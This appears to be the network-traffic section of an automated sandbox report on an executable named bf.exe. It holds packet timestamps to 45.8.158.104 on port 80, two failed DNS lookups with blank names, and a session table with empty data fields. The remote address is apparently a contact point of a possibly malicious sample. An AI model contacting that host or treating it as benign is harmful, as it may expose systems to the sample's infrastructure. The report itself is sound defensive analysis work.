Oct 13, 2022 09:30:54.542063951 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542104959 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542135954 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542151928 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542152882 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542152882 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542176008 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542217970 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542222977 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542222977 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542258024 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542258024 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542292118 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542310953 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542334080 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542336941 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542375088 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542377949 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542416096 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542418003 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542445898 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542459965 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542483091 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542485952 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542526007 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542529106 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542565107 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542570114 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542594910 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542606115 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542634964 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.584462881 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.584501982 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.584525108 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.584599972 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.584636927 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.584636927 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.584636927 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.584697008 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.584733009 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.584760904 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.584804058 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.584825993 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.584944010 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585036039 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.585130930 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585212946 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.585269928 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585347891 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.585385084 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585458994 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.585479975 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585549116 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.585585117 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585653067 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.585690975 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585764885 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.585802078 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585872889 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.585938931 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585999012 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.586014986 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.586075068 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.586082935 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.586138010 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.586149931 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.586240053 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.586277962 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.586350918 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627170086 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627224922 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627249956 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627266884 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627301931 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627306938 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627307892 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627341986 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627343893 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627382994 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627388954 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627425909 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627480030 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627522945 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627530098 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627563953 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627568007 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627604008 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627609968 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627638102 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627646923 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627679110 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627679110 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627722025 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627727032 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627763987 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627767086 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627794981 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627809048 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627837896 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.667911053 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.667968988 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.668009996 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.668042898 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.668087006 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.668175936 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.669675112 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.669718981 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.669761896 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.669770956 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.669792891 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.669802904 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.669832945 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.669832945 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.669852018 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.669879913 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.669894934 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.669919968 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.669950008 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.669960976 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.669980049 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.670032024 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.670355082 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.670396090 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |

Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 13, 2022 09:29:33.001714945 CEST | 56894 | 53 | 192.168.2.5 | 8.8.8.8 |
Oct 13, 2022 09:29:33.023427963 CEST | 53 | 56894 | 8.8.8.8 | 192.168.2.5 |
Oct 13, 2022 09:31:41.033104897 CEST | 50295 | 53 | 192.168.2.5 | 8.8.8.8 |
Oct 13, 2022 09:31:41.053165913 CEST | 53 | 50295 | 8.8.8.8 | 192.168.2.5 |

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Oct 13, 2022 09:29:33.001714945 CEST | 192.168.2.5 | 8.8.8.8 | 0x26f4 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Oct 13, 2022 09:31:41.033104897 CEST | 192.168.2.5 | 8.8.8.8 | 0x84d8 | Standard query (0) | | A (IP address) | IN (0x0001) | false |

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Oct 13, 2022 09:29:33.023427963 CEST | 8.8.8.8 | 192.168.2.5 | 0x26f4 | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Oct 13, 2022 09:31:41.053165913 CEST | 8.8.8.8 | 192.168.2.5 | 0x84d8 | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.5 | 49696 | 45.8.158.104 | 80 | C:\Users\user\Desktop\bf.exe |

Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Oct 13, 2022 09:30:53.311197996 CEST | 1 | OUT | |
Oct 13, 2022 09:30:53.640887022 CEST | 2 | IN | |